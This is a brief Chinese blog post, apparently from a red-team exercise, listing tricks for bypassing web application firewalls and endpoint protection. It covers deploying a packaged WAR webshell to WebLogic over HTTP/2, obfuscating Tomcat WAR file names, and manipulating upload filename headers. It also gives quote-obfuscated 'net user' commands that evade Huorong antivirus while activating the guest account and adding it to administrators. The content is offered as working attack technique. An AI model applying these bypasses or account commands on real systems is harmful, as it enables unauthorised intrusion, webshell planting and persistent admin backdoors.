当前位置: 首页 > news >正文

护网期间遇到的几个上传bypass waf、edr

news 2025/7/7 22:00:57

1.   weblogic部署war的时候 http/1.1 改成http/2绕过waf

其实jar和ear部署应该也可以,但是我没成功。

weblogoic 部署war死活出错,用linux下的浏览器

linux下打包war马 zip -r zipjob4.zip job/   
mv zipjob3.zip zipjob3.war

然后部署成功之后,记得访问上zipjob3/job/index.jsp

2.   tomcat  windows的话部署  1.war变成 1.w/a/r  应该是 1.w\a\r

3.  上传绕过waf

filename="x.jsp"  换成   filename == x.jsp  还不行把 把band---  = 后面加空格、反复测试就行了,先确认改了也能上传在考虑是不是能绕waf

4. 火绒加用户绕过 

n"e"t us"e"r guest 1q.asd
n"e"t us"e"r guest /active:yes
n"e"t loc"a"lgroup administrators guest /add

http://www.lryc.cn/news/356825.html

相关文章:

  • 简述MVC模式
  • C#--Mapster(高性能映射)用法
  • mysql实战——Mysql8.0高可用之双主+keepalived
  • 关于同一个地址用作两个不同页面时,列表操作栏按钮混淆状态
  • Oracle段延迟分配(Deferred Segment Creation)解析
  • Linux:IPC - System V
  • Laravel 图片添加水印
  • 嵌入式进阶——矩阵键盘
  • 请说出vue.cli项目中src目录每个文件夹和文件的用法
  • 【MySQL精通之路】InnoDB磁盘I/O和文件空间管理(11)
  • 基于springboot+html的二手交易平台(附源码)
  • 正点原子[第二期]Linux之ARM(MX6U)裸机篇学习笔记-24.3,4 SPI驱动实验-I.MX6U SPI 寄存器
  • 【Pandas】数据处理方法
  • 【ArcGIS For JS】前端geojson渲染行政区划图层并加标签
  • Spring AOP原理详解:动态代理与实际应用
  • 死锁的四个必要条件
  • 源网络地址转换SNAT
  • 【算法】平衡二叉搜索树的左旋和右旋
  • 介绍Django Ninja框架
  • 使用uniapp内置组件checkbox-group所遇到的问题
  • 嵌入式学习记录5.23(超时检测、抓包分析)
  • Linux|如何在 awk 中使用流控制语句
  • OceanBase数据库诊断调优,与高可用架构——【DBA从入门到实践】第八期
  • LLVM技术在GaussDB等数据库中的应用
  • 【SQL学习进阶】从入门到高级应用(三)
  • 迷你手持小风扇哪个品牌续航强?五款强续航迷你手持小风扇推荐!
  • SpringBoot 微服务中怎么获取用户信息 token
  • npm包-fflate
  • 华为WLAN无线组网技术与解决方案
  • 闲鱼电商运营高级课程,一部手机学会闲鱼开店赚钱